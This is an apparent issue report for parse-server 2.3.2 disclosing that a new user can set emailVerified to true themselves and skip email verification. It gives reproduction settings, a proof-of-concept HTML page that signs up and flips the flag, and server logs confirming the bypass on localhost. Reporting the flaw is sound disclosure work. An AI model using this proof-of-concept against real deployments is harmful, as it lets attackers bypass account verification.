Vulnerability: Email verification can be circumvented #3393
Description
User who has just signed up, can set emailVerified=true without actually verifying the email address. In other words, user does not have to click the link in the email to get his/her email validated.
Steps to reproduce
Steps that reproduce the issue:
-
Set the following settings in the server.js:
verifyUserEmails: true,
emailVerifyTokenValidityDuration: 2 * 60 * 60,
preventLoginWithUnverifiedEmail: true, -
signup, set emailVerified: true and save user. Here is sample html page that does just that:
<html>
<head>
<script type="text/javascript" src="https://npmcdn.com/parse/dist/parse.js"\>\</script>
<script type="text/javascript">
function signupAndSetEmailVerified()
{
Parse.initialize('e5c10b31d8716509af3e571260');
Parse.serverURL = 'http://127.0.0.1:8888/parse';
var user = new Parse.User();
user.set("username", "hacker");
user.set("password", "passwd");
user.set("email", "[email protected]");
user.signUp(null, {
success: function(user) {
// Signup succeeded
alert("Signup succeeded");
// Try hack emailVerified to true (should not succeed)
user.set("emailVerified",true);
user.save(null, {
success : function(userAgain) {
// Execute any logic that should take place after the object is saved.
alert('Save succeeded');
},
error : function(userAgain, error) {
alert('Save failed with '+error.message);
}
});
},
error: function(user, error) {
// Show the error message somewhere and let the user try again.
alert("Error: " + error.code + "\n\nwhat is the error \n\n " + error.message);
}
});
}
</script>
</head>
<body onload="signupAndSetEmailVerified()">
</body>
</html>
Expected Results
Save should fail or at least emailVerified should still be false in the database for this user.
Actual Outcome
emailVerified is true in the database for this new user.
Environment Setup
-
Server
- parse-server version (Be specific! Don't say 'latest'.) : 2.3.2
- Operating System: Ubuntu 14.04.5 LTS (running on VirtualBox virtual machine)
- Hardware: EliteBook 8470p running VirtualBox Version 5.0.30 r112061
- Localhost or remote server? (AWS, Heroku, Azure, Digital Ocean, etc): localhost
-
Database
- MongoDB version: v3.0.9. This issue is also reproducible with Postgresql 9.4.
- Storage engine: default
- Hardware: EliteBook 8470p running VirtualBox Version 5.0.30 r112061
- Localhost or remote server? (AWS, mLab, ObjectRocket, Digital Ocean, etc): localhost
Logs/Trace
�[36mverbose�[39m: REQUEST for [POST] /parse/users: {
"username": "hacker",
"password": "",
"email": "[email protected]"
} method=POST, url=/parse/users, host=127.0.0.1:1337, user-agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0, accept=text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8, accept-language=en-US,en;q=0.5, accept-encoding=gzip, deflate, content-type=text/plain, origin=null, x-forwarded-for=10.0.2.2, x-forwarded-host=127.0.0.1:8888, x-forwarded-server=localhost, connection=Keep-Alive, content-length=214, username=hacker, password=, email=[email protected]
�[36mverbose�[39m: RESPONSE from [POST] /parse/users: {
"status": 201,
"response": {
"objectId": "cyl7z1XcSe",
"createdAt": "2017-01-18T12:16:05.861Z",
"sessionToken": "r:c54acc4bbcf051b306c7d0f8d4982646"
},
"location": "http://127.0.0.1:8888/parse/users/cyl7z1XcSe"
} status=201, objectId=cyl7z1XcSe, createdAt=2017-01-18T12:16:05.861Z, sessionToken=r:c54acc4bbcf051b306c7d0f8d4982646, location=http://127.0.0.1:8888/parse/users/cyl7z1XcSe
�[36mverbose�[39m: REQUEST for [PUT] /parse/classes/_User/cyl7z1XcSe: {
"emailVerified": true
} method=PUT, url=/parse/classes/_User/cyl7z1XcSe, host=127.0.0.1:1337, user-agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0, accept=text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8, accept-language=en-US,en;q=0.5, accept-encoding=gzip, deflate, content-type=text/plain, origin=null, x-forwarded-for=10.0.2.2, x-forwarded-host=127.0.0.1:8888, x-forwarded-server=localhost, connection=Keep-Alive, content-length=235, emailVerified=true
�[36mverbose�[39m: RESPONSE from [PUT] /parse/classes/_User/cyl7z1XcSe: {
"response": {
"updatedAt": "2017-01-18T12:16:06.833Z"
}
} updatedAt=2017-01-18T12:16:06.833Z